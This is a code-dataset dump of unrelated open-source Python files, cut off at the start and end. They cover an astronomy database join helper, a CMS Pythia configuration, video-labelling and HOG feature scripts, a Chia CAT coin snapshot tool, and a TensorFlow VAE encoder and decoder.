t_taken = 1e3 * (time() - t_init)\n logger.debug(\"SQL query took {0:.0f} ms: {1} (values: {2})\".format(\n t_taken, query, values))\n\n names = None if cursor.description is None \\\n else tuple([col[0] for col in cursor.description])\n\n if not cursor_supplied:\n cursor.close()\n\n return (names, results, cursor)\n\n\n\n\n\n def _local_join(self, query, table_name, table, values=None, analyze=True,\n **kwargs):\n r\"\"\"\n Perform a join between a local table and a remote catalogue on the\n World Sky Database.\n\n \"\"\"\n\n delimiter = kwargs.get(\"delimiter\", \",\")\n conversions = {\n np.int32: \"integer\",\n np.int64: \"bigint\",\n np.float32: \"real\",\n np.float64: \"double precision\",\n np.string_: \"varchar\"\n }\n\n schema = []\n for column, (dtype, _) in table.dtype.fields.items():\n if \" \" in column:\n raise ValueError(\"invalid column name: cannot contain spaces\")\n schema.append(\"{0} {1}\".format(column, conversions[dtype.type]))\n\n _, local_path = mkstemp()\n\n table.write(local_path, format=\"ascii.no_header\", delimiter=delimiter,\n overwrite=True)\n\n with self._connection.cursor() as cursor:\n\n self.execute(\"\"\"\n SET cursor_tuple_fraction TO 1;\n SET enable_seqscan TO off;\n SET enable_mergejoin to off;\n set enable_hashjoin to off;\n \"\"\")\n\n self.execute(\"CREATE TEMPORARY TABLE {0} ({1})\".format(\n table_name, \", \".join(schema)), cursor=cursor)\n\n try:\n logger.debug(\"Copying from {}\".format(local_path))\n\n with open(local_path, \"r\") as fp:\n cursor.copy_from(fp, table_name,\n sep=delimiter, columns=table.dtype.names)\n\n if analyze:\n self.execute(\"ANALYZE {0}\".format(table_name), cursor=cursor)\n\n logger.debug(\"Ready\")\n\n except (pg.ProgrammingError, pg.DataError):\n logger.exception(\"Failed to upload table:\")\n self._connection.rollback()\n\n result = self.select(query, values, cursor=cursor)\n\n self._connection.rollback()\n #cursor.close()\n\n os.unlink(local_path)\n return result\n","repo_name":"GOTO-OBS/goto-wsdb","sub_path":"wsdb/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15168085986","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process('GEN')\n\n# import of standard configurations\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.EventContent.EventContent_cff')\nprocess.load('SimGeneral.MixingModule.mixNoPU_cfi')\nprocess.load('Configuration.Geometry.GeometryExtended2015Reco_cff')\nprocess.load('Configuration.Geometry.GeometryExtended2015_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_38T_PostLS1_cff')\nprocess.load('Configuration.StandardSequences.Generator_cff')\nprocess.load('IOMC.EventVertexGenerators.VtxSmearedRealistic8TeVCollision_cfi')\nprocess.load('GeneratorInterface.Core.genFilterSummary_cff')\nprocess.load('Configuration.StandardSequences.SimIdeal_cff')\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(1000)\n)\n\n# Input source\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.options = cms.untracked.PSet()\n\n# Output definition\n\nprocess.RAWSIMoutput = cms.OutputModule(\"PoolOutputModule\",\n splitLevel = cms.untracked.int32(0),\n eventAutoFlushCompressedSize = cms.untracked.int32(5242880),\n outputCommands = process.RAWSIMEventContent.outputCommands,\n fileName = cms.untracked.string('file:MinbiasTest_GEN.root'),\n dataset = cms.untracked.PSet(\n filterName = cms.untracked.string(''),\n dataTier = cms.untracked.string('GEN-SIM')\n ),\n SelectEvents = cms.untracked.PSet(\n SelectEvents = cms.vstring('generation_step')\n )\n)\n\n# Additional output definition\n\n# Other statements\nprocess.genstepfilter.triggerConditions=cms.vstring(\"generation_step\")\n\nprocess.load(\"Configuration.TotemCommon.PythiaSD_cfi\")\nprocess.generator.Verbosity = cms.untracked.int32(0)\nprocess.generator.maxEventsToPrint = cms.untracked.int32(10)\nprocess.generator.comEnergy = cms.double(13000.0)\n\n\n# Path and EndPath definitions\nprocess.generation_step = cms.Path(process.pgen)\nprocess.RAWSIMoutput_step = cms.EndPath(process.RAWSIMoutput)\n\n# Schedule definition\nprocess.schedule = cms.Schedule(process.generation_step, process.RAWSIMoutput_step)\n# filter all path with the production filter sequence\nfor path in process.paths:\n\tgetattr(process,path)._seq = process.generator * getattr(process,path)._seq \n\n# customisation of the process.\n\n# Automatic addition of the customisation function from SLHCUpgradeSimulations.Configuration.postLS1Customs\nfrom SLHCUpgradeSimulations.Configuration.postLS1Customs import customisePostLS1 \n\n#call to customisation function customisePostLS1 imported from SLHCUpgradeSimulations.Configuration.postLS1Customs\nprocess = customisePostLS1(process)\n\n# End of customisation functions\n","repo_name":"MyEtesami/src","sub_path":"Configuration/TotemStandardSequences/test/RPT1T2CMS/step0_Pythia.py","file_name":"step0_Pythia.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12403572983","text":"# 视频帧率25fps\nimport argparse\nimport cv2\nimport h5py\nimport numpy as np\nfrom hog_feature import HogDescriptor\nimport os\na = []\nb = []\n\n# 提取视频帧,并全部标注为0\ndef label_data(args):\n dataroot = args.video_path\n datafile = h5py.File(args.data_store_path, 'w')\n crop_size = int(args.crop_size/2)\n sample = []\n label = []\n cap = cv2.VideoCapture(dataroot)\n k = 0\n i = 1\n while True:\n k = k + 1\n print(k)\n ret, frame = cap.read()\n if ret: # 视频未读取完,有帧存在\n temp = frame[b[-1] - crop_size:b[-1] + crop_size, a[-1] - crop_size:a[-1] + crop_size, :]\n temp = cv2.cvtColor(temp, cv2.COLOR_RGB2GRAY)\n temp = np.array(temp)\n # cv2.imshow('label',temp)\n frame = cv2.rectangle(frame, (a[-1] - crop_size, b[-1] - crop_size), (a[-1] + crop_size, b[-1] + crop_size), (0, 0, 255), 2)\n cv2.imshow('img', frame)\n cv2.waitKey(10)\n label_class = 0 # 先全部标注为0,然后再修改其中部分为进球帧\n print(\"No.{} frame, Label = {}\".format(k, label_class))\n label.append(label_class)\n sample.append(temp)\n else:\n break\n cap.release()\n cv2.destroyAllWindows()\n datafile.create_dataset('data', data=sample)\n datafile.create_dataset('label', data=label)\n datafile.close()\n\ndef on_Mouse(event, x, y, flag, param):\n if event == cv2.EVENT_LBUTTONDOWN:\n xy = \"%d,%d\" % (x, y)\n a.append(x)\n b.append(y)\n print(a[-1], b[-1])\n\n# 将标注的txt文件写入data.h5\ndef annotation2dataset(args):\n annotation_path = args.annotation_path\n root_path = args.data_store_path\n store_path = args.anno_data_store_path\n file = open(annotation_path, 'r', encoding='utf-8')\n old_dataset = h5py.File(root_path, 'r')\n print([key for key in old_dataset.keys()])\n origin_data = old_dataset[\"data\"][:]\n origin_label = old_dataset[\"label\"][:]\n old_dataset.close()\n new_dataset = h5py.File(store_path, 'w')\n for line in file.readlines(): # 读取标注信息\n line = line.split()\n start_frame = line[0]\n end_frame = line[1]\n if start_frame == end_frame: # 仅有一帧\n origin_label[int(start_frame)] = 1\n else: # 有球帧标注为1\n for i in range(int(start_frame), int(end_frame) + 1):\n origin_label[i] = 1\n print(origin_label[:])\n new_dataset.create_dataset('data', data=origin_data)\n new_dataset.create_dataset('label', data=origin_label)\n new_dataset.close()\n file.close()\n\n# 提取hog特征\ndef hog_extract(args):\n dataroot = args.anno_data_store_path\n storeroot = args.hog_feature_store_path\n hog = HogDescriptor(args.hog_cell_size, args.hog_block_size, args.hog_stride, args.hog_bins)\n feature = []\n temp_label = []\n datafile = h5py.File(dataroot, 'r')\n print(len(datafile['data']), len(datafile['label']))\n data = np.array(datafile['data'][0:])\n label = np.array(datafile['label'][0:])\n print(len(data), len(label))\n\n for i in range(100):\n feature.append(hog.calculate_hog(data[i])[0])\n # print(len(hog.calculate_hog(data[i])))\n temp_label.append(label[i])\n print('the %d picture has been prepared'%(i+1))\n storefile = h5py.File(storeroot, 'w')\n storefile.create_dataset('data', data=feature)\n storefile.create_dataset('label', data=temp_label)\n storefile.close()\n print('%d features and %d labels have been stored'%(len(feature),len(temp_label)))\n\n# 2-frame hog\ndef make2frame(args):\n f = h5py.File(args.hog_feature_store_path, 'r')\n data = np.array(f['data'])\n label = np.array(f['label'])\n new_data = []\n new_label = []\n for i in range(len(label)-1):\n new_data.append(np.append(data[i], data[i+1]))\n new_label.append(label[i] or label[i+1])\n new_f = h5py.File(\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/data/data3_hog_2frame.h5\",'w')\n new_f.create_dataset('data', data=new_data)\n new_f.create_dataset('label', data=new_label)\n new_f.close()\n print(\"successfullt generate two frame\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n # 任务类型\n parser.add_argument('--task', type=str, default=\"label\")\n # 视频路径\n parser.add_argument('--video_path', type=str, default=\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/video/basketball-video-03.avi\")\n # 提取视频帧存储路径(label全为0)\n parser.add_argument('--data_store_path', type=str, default=\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/data/data3.h5\")\n # 标注文件路径(.txt)\n parser.add_argument('--annotation_path', type=str, default=\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/annotation.txt\")\n # 标注后视频帧存储路径\n parser.add_argument('--anno_data_store_path', type=str, default=\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/data/data3_anno.h5\")\n # 提取hog特征后数据集存储路径\n parser.add_argument('--hog_feature_store_path', type=str, default=\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/data/data3_hog.h5\")\n # 球框帧大小\n parser.add_argument('--crop_size', type=int, default=100)\n # 特征类别,单帧hog或双帧hog\n parser.add_argument('--feature_type', type=str, default=\"one_frame_hog\")\n # hog cell大小\n parser.add_argument('--hog_cell_size', type=int, default=8)\n # hog block大小\n parser.add_argument('--hog_block_size', type=int, default=2)\n # hog block滑动步长\n parser.add_argument('--hog_stride', type=int, default=8)\n # hog 角度数量\n parser.add_argument('--hog_bins', type=int, default=9)\n args = parser.parse_args()\n\n if args.task == \"label\":\n cap = cv2.VideoCapture(args.video_path)\n ret, frame = cap.read()\n cv2.namedWindow('frame')\n cv2.setMouseCallback('frame', on_Mouse)\n cv2.imshow('frame', frame)\n cv2.waitKey(0)\n cap.release()\n cv2.destroyAllWindows()\n print(a[-1], b[-1]) # 打印方框坐标\n label_data(args)\n elif args.task == \"annotation\":\n annotation2dataset(args)\n elif args.task == \"hog_extract\":\n hog_extract(args)\n if args.feature_type == \"two_frame_hog\":\n make2frame(args)","repo_name":"Rye-Catcher-ZCH/2020-zju-summer-intern","sub_path":"label/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31631970241","text":"print(\"redistabuting files\")\n\ndataset=\"testA\"\nimport random\n\nimport os \nimport shutil\nsplit =0.1 #size of test DO NOT SET TO ZERO\n\ncwd = os.getcwd()\n\n\nwdvalidation=os.path.join( os.path.join( cwd , dataset),\"validation\")\nwdtrain=os.path.join( os.path.join( cwd , dataset),\"train\")\n\n# print(fodervalidation)\n\ndef create_dir(dir):\n if not os.path.exists(dir):\n os.makedirs(dir)\ncreate_dir(wdvalidation)\ncreate_dir(wdtrain)\n\nfodervalidation = os.listdir(wdvalidation)\nfor i in fodervalidation:\n create_dir(os.path.join(wdtrain,i))\n \nfodertrain = os.listdir(wdtrain)\nfor i in fodertrain:\n create_dir(os.path.join(wdvalidation,i))\n\nfor i in fodervalidation:\n wdv = os.path.join(wdvalidation,i)\n wdt = os.path.join(wdtrain,i)\n temp = os.listdir(wdv)\n\n for j in temp:\n pfrom =os.path.join(wdv,j)\n pto=os.path.join(wdt,j)\n os.replace(pfrom,pto)\n\n# print(\"step1\\n\\n\\n\\n\")\n\n\nfodertrain = os.listdir(wdtrain)\nfor i in fodertrain:\n wdv = os.path.join(wdvalidation,i)\n wdt = os.path.join(wdtrain,i)\n temp = os.listdir(wdt)\n\n for j in temp:\n if(random.random()<split):\n pfrom =os.path.join(wdt,j)\n pto=os.path.join(wdv,j)\n os.replace(pfrom,pto)\n# print(fodertrain)\n# for i in fodervalidation:\n# wd = cwd + dataset+\"/validation/\"+i\n# temp = os.listdir(wd)\n# for j in temp:\n# if(random.random()<split):\n# os.replace(cwd + dataset+\"test/\"+i+\"/\"+j,cwd + dataset+\"validation/\"+i+\"/\"+j)\n \n\n\nprint(\"redistabuting complet\")\n\n\n\n\n\n","repo_name":"COS301-SE-2020/Team-Zenith-Animal-Track-Recognition","sub_path":"Server/backend-graphQL/301 03/fileSplit.py","file_name":"fileSplit.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"165471789","text":"# coding: utf-8\n\nimport logging\n\nfrom pytest_bdd import parsers\n\nfrom tests_common.pytest_bdd import then\nfrom .folder import parse_counter\n\nfrom hamcrest import (\n assert_that,\n has_properties,\n)\n\nlog = logging.getLogger(__name__)\n\n\nATTACH_COUNTERS_RE = r'''\nuser has\n\\s*\n(?:(?P<has_attaches_count>({0})) messages? with attaches)\n(?:\n(,| and)?\\s*\n(?:\n(?:(?P<has_attaches_unseen>({0})) unseen)|\n(?:(?P<has_attaches_seen>({0})) seen)\n)\n)*\n'''.format(r'zero|no|not|one|\"\\d+\"').strip().replace('\\n', '')\n\n\n@then(ATTACH_COUNTERS_RE, parse_builder=parsers.re)\ndef step_check_attach_counters(context):\n kwargs = context.args\n counters = {}\n for k in [\n 'has_attaches_count',\n 'has_attaches_seen',\n 'has_attaches_unseen']:\n val = parse_counter(kwargs[k])\n if val is not None:\n counters[k] = val\n\n assert_that(context.qs.attach_counters(), has_properties(counters))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/pytest_bdd/steps/attach_counters.py","file_name":"attach_counters.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37295800119","text":"import time\n\nimport pymunk\nfrom pymunk.pyglet_util import DrawOptions\n\nimport pyglet\n\nfrom engine.body import Group, Body, Circle, Segment\n\nwindow = pyglet.window.Window(900, 600, \"Pymunk Tester\", resizable=False)\noptions = DrawOptions()\n\nspace = pymunk.Space()\nspace.gravity = 0, -1000\n\ncircles = Group()\ncircles.add_all([\n Circle(450, 500, 30, 2),\n Circle(452, 400, 30)\n])\ncircles.set_attribute(\"elasticity\", 0.98)\ncircles.set_attribute(\"friction\", 1.0)\ncircles.add_to_space(space)\n\npj = pymunk.PinJoint(*[c.body for c in circles.children])\nspace.add(pj)\n\nsegments = Group()\nsegments.add_all([\n Segment((50, 50), (850, 50), 2, body_type=Body.STATIC),\n Segment((50, 550), (50, 50), 2, body_type=Body.STATIC),\n Segment((50, 550), (850, 550), 2, body_type=Body.STATIC),\n Segment((850, 550), (850, 50), 2, body_type=Body.STATIC)\n])\nsegments.set_attribute(\"elasticity\", 0.98)\nsegments.set_attribute(\"friction\", 1.0)\nsegments.add_to_space(space)\n\n@window.event\ndef on_draw():\n window.clear()\n space.debug_draw(options)\n\ndef update(dt):\n space.step(dt)\n\nif __name__ == \"__main__\":\n pyglet.clock.schedule_interval(update, 1.0 / 60.0)\n pyglet.app.run()","repo_name":"henrymwestfall/Pyglet-Pymunk-Test","sub_path":"pymunk-practice.py","file_name":"pymunk-practice.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"75023603751","text":"import sys\nimport os\nimport codecs\n\nfrom_encoding = 'iso-8859-2'\nto_encoding = 'utf-8'\n\nif len(sys.argv) < 2:\n print('Nincs megadva fájlnév.')\n sys.exit(1)\n\ncsv_file = sys.argv[1]\ntarget_filename = f'utf8_{csv_file}'\nif not os.path.exists(target_filename):\n print(f'Converting {csv_file}')\n with codecs.open(csv_file, 'r', from_encoding) as source_file:\n with codecs.open(target_filename, 'w', to_encoding) as target_file:\n for line in source_file:\n converted_line = line.encode(to_encoding).decode(to_encoding)\n target_file.write(converted_line)\n print('Ready. Bye.')\nelse:\n print(f'{target_filename} is already there, not re-encoding it.')\n","repo_name":"Code-for-Hungary/agrartamdataloader","sub_path":"convert_encoding.py","file_name":"convert_encoding.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10138458672","text":"\"\"\"Set of utility functions for GraphTensor tests.\"\"\"\n\nfrom typing import Mapping, Text\n\nfrom absl.testing import parameterized\nimport tensorflow as tf\nfrom tensorflow_gnn.graph import graph_constants as const\nfrom tensorflow_gnn.graph import graph_tensor_encode as ge\nfrom tensorflow_gnn.graph import graph_tensor_random as gr\nfrom tensorflow_gnn.graph import schema_utils as su\nfrom tensorflow_gnn.proto import graph_schema_pb2 as schema_pb2\n\n\nclass GraphTensorTestBase(tf.test.TestCase, parameterized.TestCase):\n \"\"\"Base class for GraphTensor tests.\"\"\"\n\n def assertFieldsEqual(self, actual: const.Fields, expected: const.Fields):\n self.assertIsInstance(actual, Mapping)\n self.assertAllEqual(actual.keys(), expected.keys())\n for key in actual.keys():\n self.assertAllEqual(actual[key], expected[key], msg=f'feature={key}')\n\n\ndef generate_random_data_files(schema: schema_pb2.GraphSchema,\n filebase: Text,\n num_shards: int,\n num_examples: int):\n \"\"\"Write some random data to a file.\n\n Args:\n schema: A GraphSchema instance.\n filebase: A string, base filename.\n num_shards: The number of shards to generate.\n num_examples: The number of examples to produce.\n \"\"\"\n filenames = ['{}-{:05d}-of-{:05d}'.format(filebase, shard, num_shards)\n for shard in range(num_shards)]\n num_base_examples = num_examples // len(filenames)\n remainder = num_examples - num_base_examples * len(filenames)\n\n spec = su.create_graph_spec_from_schema_pb(schema)\n for findex, filename in enumerate(filenames):\n with tf.io.TFRecordWriter(filename) as file_writer:\n num_shard_examples = num_base_examples + (1 if findex < remainder else 0)\n for _ in range(num_shard_examples):\n graph = gr.random_graph_tensor(spec)\n example = ge.write_example(graph)\n file_writer.write(example.SerializeToString())\n","repo_name":"xjdlb/my-awesome-tensorlfow-tutorial","sub_path":"gnn-main/tensorflow_gnn/graph/graph_tensor_test_utils.py","file_name":"graph_tensor_test_utils.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"71525035433","text":"#!/bin/python\n\nimport random\n\nclass Bandits:\n def __init__(self, num):\n self.u = [random.random() for i in xrange(num)]\n def getReward(self, a):\n if a < 0 or a > len(self.u):\n raise Exception(\"Invalid a %d\"%(a))\n\n r = random.random()\n if r <= self.u[a]:\n return 1;\n else:\n return 0;\n \n \n\n","repo_name":"algorithmdog/Reinforcement_Learning_Blog","sub_path":"MultiArmedBandits/multi_armed_bandits.py","file_name":"multi_armed_bandits.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"72"} +{"seq_id":"11816563973","text":"import logging\nfrom typing import Dict, List, Optional\nfrom chia.types.blockchain_format.coin import Coin\nfrom chia.types.blockchain_format.program import Program\nfrom chia.types.blockchain_format.sized_bytes import bytes32\nfrom chia.types.coin_spend import CoinSpend\nfrom chia.types.condition_opcodes import ConditionOpcode\nfrom chia.types.condition_with_args import ConditionWithArgs\nfrom chia.util.ints import uint64\nfrom chia.util.hash import std_hash\nfrom chia.wallet.cat_wallet.cat_utils import construct_cat_puzzle\nfrom clvm.casts import int_from_bytes, int_to_bytes\nfrom src.coin_spend_record import CoinSpendRecord\nfrom src.coin_create_record import CoinCreateRecord\nfrom src.cat_utils import create_coin_conditions_for_inner_puzzle, extract_cat1\nfrom src.config import Config\nfrom src.database import connection, get_initial_id, get_next_coin_spends, persist_coin_create, persist_coin_spend\nfrom src.full_node import FullNode\nfrom src.puzzles.cat_loader import CAT1_MOD\n\n\ndef created_outputs_for_conditions_dict(\n conditions_dict: Dict[ConditionOpcode, List[ConditionWithArgs]],\n input_coin_name: bytes32,\n) -> List[Coin]:\n output_coins = []\n for cvp in conditions_dict.get(ConditionOpcode.CREATE_COIN, []):\n puzzle_hash, amount_bin = cvp.vars[0], cvp.vars[1]\n amount = int_from_bytes(amount_bin)\n # ignore magic conditions\n if amount > 0:\n coin = Coin(input_coin_name, bytes32(puzzle_hash), uint64(amount))\n output_coins.append(coin)\n return output_coins\n\n\nclass CatSnapshot:\n log = logging.getLogger('CatSnapshot')\n full_node: FullNode\n\n def __init__(self, full_node: FullNode):\n self.full_node = full_node\n\n @staticmethod\n async def create():\n full_node = await FullNode.create()\n\n return CatSnapshot(full_node)\n\n async def generate(self):\n # Collect CAT coin spends\n height = Config.start_height\n while True:\n if height > Config.target_height:\n break\n\n await self.__process_block(height)\n\n height = height + 1\n # Extract coin create conditions from coin spends\n id = get_initial_id(Config.start_height)\n if id is None:\n self.log.warn(\"No new coin spends were discovered by this scan\")\n\n connection.close()\n self.full_node.close()\n\n return None\n while True:\n coin_spends = get_next_coin_spends(id, 100)\n\n if len(coin_spends) == 0:\n break\n\n for (\n id,\n coin_name,\n inner_puzzle,\n outer_puzzle,\n inner_solution,\n outer_solution,\n amount,\n tail_hash,\n spent_height\n ) in coin_spends:\n self.log.info(\n \"coin_name %s amount %i tail_hash %s spent_height %s\",\n coin_name,\n amount,\n tail_hash,\n spent_height\n )\n inner_puzzle = Program.fromhex(inner_puzzle)\n outer_puzzle = Program.fromhex(outer_puzzle)\n inner_solution = Program.fromhex(inner_solution)\n outer_solution = Program.fromhex(outer_solution)\n\n inner_puzzle_create_coin_conditions = create_coin_conditions_for_inner_puzzle(\n bytes32.fromhex(coin_name),\n inner_puzzle,\n inner_solution\n )\n\n cursor = connection.cursor()\n\n for coin in inner_puzzle_create_coin_conditions:\n outer_puzzle_hash = construct_cat_puzzle(\n CAT1_MOD,\n bytes32.fromhex(tail_hash),\n coin.puzzle_hash\n ).get_tree_hash(coin.puzzle_hash)\n\n created_coin_name = std_hash(\n bytes32.fromhex(coin_name) + outer_puzzle_hash + int_to_bytes(coin.amount)\n ).hex()\n\n coin_create_record = CoinCreateRecord(\n coin_name=created_coin_name,\n inner_puzzle_hash=coin.puzzle_hash.hex(),\n outer_puzzle_hash=outer_puzzle_hash.hex(),\n amount=coin.amount,\n tail_hash=tail_hash,\n created_height=spent_height\n ) \n\n persist_coin_create(cursor, coin_create_record)\n\n self.log.info(\n \"Persisted CAT coin created with name %s, TAIL %s, height %i\",\n created_coin_name,\n tail_hash,\n spent_height\n )\n\n connection.commit()\n cursor.close()\n\n id = id + 1\n \n self.full_node.close()\n\n async def __process_block(self, height: int):\n block_record = await self.full_node.get_block_record_by_height(height)\n\n self.log.debug(\"Got block record %s at height: %i\", block_record.header_hash, height)\n\n if block_record.timestamp is not None:\n self.log.debug(\"Processing transaction block %s\", block_record.header_hash)\n\n coin_spends = await self.full_node.get_block_spends(block_record.header_hash)\n\n if coin_spends is not None:\n self.log.info(\"%i spends found in block\", len(coin_spends))\n self.__process_coin_spends(height, block_record.header_hash, coin_spends)\n else:\n self.log.info(\"None at %i\", height)\n else:\n self.log.info(\"Skipping non-transaction block at height %i\", height)\n\n def __process_coin_spends(self, height, header_hash: str, coin_spends: Optional[List[CoinSpend]]):\n if coin_spends is None or len(coin_spends) == 0:\n return None\n\n self.log.info(\"Processing %i coin spends for block %s at height %i\", len(coin_spends), header_hash, height)\n\n cursor = connection.cursor()\n\n for coin_spend in coin_spends:\n result = extract_cat1(coin_spend)\n\n if result is None:\n self.log.debug(\"Found non-CAT coin spend\")\n else:\n outer_puzzle = coin_spend.puzzle_reveal.to_program()\n outer_solution = coin_spend.solution.to_program()\n inner_solution = outer_solution.first()\n (\n tail_hash,\n outer_puzzle,\n _,\n inner_puzzle,\n _\n ) = result\n\n spent_coin_record = CoinSpendRecord(\n coin_name=coin_spend.coin.name().hex(),\n inner_puzzle=inner_puzzle.__str__(),\n outer_puzzle=outer_puzzle.__str__(),\n inner_solution=inner_solution.__str__(),\n outer_solution=outer_solution.__str__(),\n amount=coin_spend.coin.amount,\n tail_hash=tail_hash.as_python().hex(),\n spent_height=height\n )\n\n persist_coin_spend(cursor, spent_coin_record)\n\n connection.commit()\n cursor.close()\n","repo_name":"Chia-Network/CAT-addresses","sub_path":"src/cat_snapshot.py","file_name":"cat_snapshot.py","file_ext":"py","file_size_in_byte":7340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13654202585","text":"import tensorflow as tf\nimport numpy as np\nimport model_2d\nimport sys\n\n\nnchannel = 19\n\ndef convolutional_encoder(x, n_hidden, n_output, keep_prob):\n\n pool_size = 2\n\n with tf.variable_scope('conv_enc'):\n x = tf.reshape(x, [-1, x.get_shape()[-1], 1])\n conv1 = tf.layers.conv1d(x, filters=n_hidden, activation=tf.nn.elu, kernel_size=4, dilation_rate=2)\n drop = tf.nn.dropout(conv1, keep_prob)\n mp1 = tf.layers.max_pooling1d(drop, pool_size=pool_size, strides=pool_size)\n conv2 = tf.layers.conv1d(mp1, filters=n_hidden, activation=tf.nn.elu, kernel_size=2, dilation_rate=2)\n drop = tf.nn.dropout(conv2, keep_prob)\n mp2 = tf.layers.flatten(tf.layers.max_pooling1d(drop, pool_size=pool_size, strides=pool_size))\n\n # output layer\n # borrowed from https: // github.com / altosaar / vae / blob / master / model.py\n wo = tf.get_variable('wo', [mp2.get_shape()[1], n_output * 2],\n initializer=tf.contrib.layers.variance_scaling_initializer())\n bo = tf.get_variable('bo', [n_output * 2], initializer=tf.constant_initializer(0.))\n gaussian_params = tf.matmul(mp2, wo) + bo\n\n # The mean parameter is unconstrained\n mean = gaussian_params[:, :n_output]\n # The standard deviation must be positive. Parametrize with a softplus and\n # add a small epsilon for numerical stability\n stddev = tf.nn.softplus(gaussian_params[:, n_output:] + 1e-8)\n\n return mean, stddev\n\ndef conv_upsample_block(input, n_hidden, keep_prob):\n conv = tf.layers.conv1d(input, filters=n_hidden, activation=tf.nn.elu, kernel_size=3, padding='same')\n drop = tf.nn.dropout(conv, keep_prob)\n drop = tf.reshape(drop, [-1, 1, drop.get_shape()[1], n_hidden])\n # Use resize images to upsample\n us = tf.image.resize_images(drop, size=[1, drop.get_shape()[2] * 2])\n us = tf.reshape(us, [-1, us.get_shape()[2], n_hidden])\n return us\n\n#def conv1d_upsample_block(input, n_hidden, n_output, keep_prob):\n #conv = tf.contrib.nn.conv1d_transpose(input, filter=n_hidden, stride=2, kernel_size=2, padding='same')\n #return conv\n\ndef full_rf_block(input, n_hidden, n_output, keep_prob):\n\n conv = tf.layers.conv1d(input, filters=n_hidden, activation=tf.nn.elu, kernel_size=8, padding='same')\n conv = tf.layers.conv1d(conv, filters=n_hidden, activation=tf.nn.elu, kernel_size=8, padding='same')\n conv = tf.layers.conv1d(conv, filters=n_hidden, activation=tf.nn.elu, kernel_size=8, padding='same')\n\n\ndef conv1d_shuffle_upsample_block(input, n_hidden, n_output, keep_prob, upsample_amount=2, loop_num=0):\n conv = tf.layers.conv1d(input, filters=n_hidden, activation=tf.nn.elu, kernel_size=2**(loop_num+1), padding='same')\n conv = tf.layers.conv1d(conv, filters=n_hidden, activation=tf.nn.elu, kernel_size=2**(loop_num+1), padding='same')\n conv = tf.layers.conv1d(conv, filters=n_hidden, activation=tf.nn.elu, kernel_size=2**(loop_num+1), padding='same')\n\n # batch x size x n_filters/2\n out = tf.reshape(conv, [-1, conv.get_shape()[1].value * upsample_amount,\n tf.cast(n_hidden / upsample_amount, tf.int32)])\n return out\n\ndef conv1d_shuffle_decoder(input, n_hidden, n_output, keep_prob):\n # start with 64\n n_latent = 64\n shuf = tf.layers.dense(input, n_latent)\n\n\n upsample_factor=2\n\n x = tf.reshape(shuf, [-1, input.get_shape()[1].value, 1])\n # get number of doubling layers required\n import math\n num_layers = np.ceil(math.log(n_output / n_latent, upsample_factor)).astype(int)\n # need to upscale by 38\n # 2x2x2x2x2x2\n for i in range(num_layers):\n x = conv1d_shuffle_upsample_block(x, n_hidden, n_output, keep_prob, upsample_amount=upsample_factor, loop_num=i)\n\n # now 64x64 -> trim from edges to arrive at n_output\n #x = tf.layers.conv1d(x, filters=1, kernel_size=1)\n x = tf.layers.flatten(tf.layers.conv1d(x, filters=1, kernel_size=1))\n start = tf.cast((x.get_shape()[1].value - n_output) / 2, tf.int32)\n return x[:, start:start+n_output]\n\ndef convolutional_decoder(x, n_hidden, n_output, keep_prob):\n with tf.variable_scope('conv_dec'):\n\n # Linear layer\n #x = tf.layers.dense(x, n_output / 8, activation=tf.nn.elu)\n x = tf.reshape(x, [-1, 64, 1])\n\n act1 = conv_upsample_block(x, n_hidden * 2, keep_prob)\n #act2 = conv_upsample_block(act1, n_hidden * 2, keep_prob)\n #act3 = conv_upsample_block(act2, n_hidden, keep_prob)\n\n # Final convolution for output\n conv3 = tf.layers.conv1d(act1, filters=1, activation=tf.nn.sigmoid, kernel_size=1)\n output = tf.layers.flatten(conv3)\n\n return output\n\n# Gaussian MLP as encoder\ndef gaussian_MLP_encoder(x, n_hidden, n_output, keep_prob):\n with tf.variable_scope(\"gaussian_MLP_encoder\"):\n # initializers\n w_init = tf.contrib.layers.variance_scaling_initializer()\n b_init = tf.constant_initializer(0.)\n\n # 1st hidden layer\n\n #embeddings = tf.get_variable(\"embeddings\", [256, 16])\n #embedded = 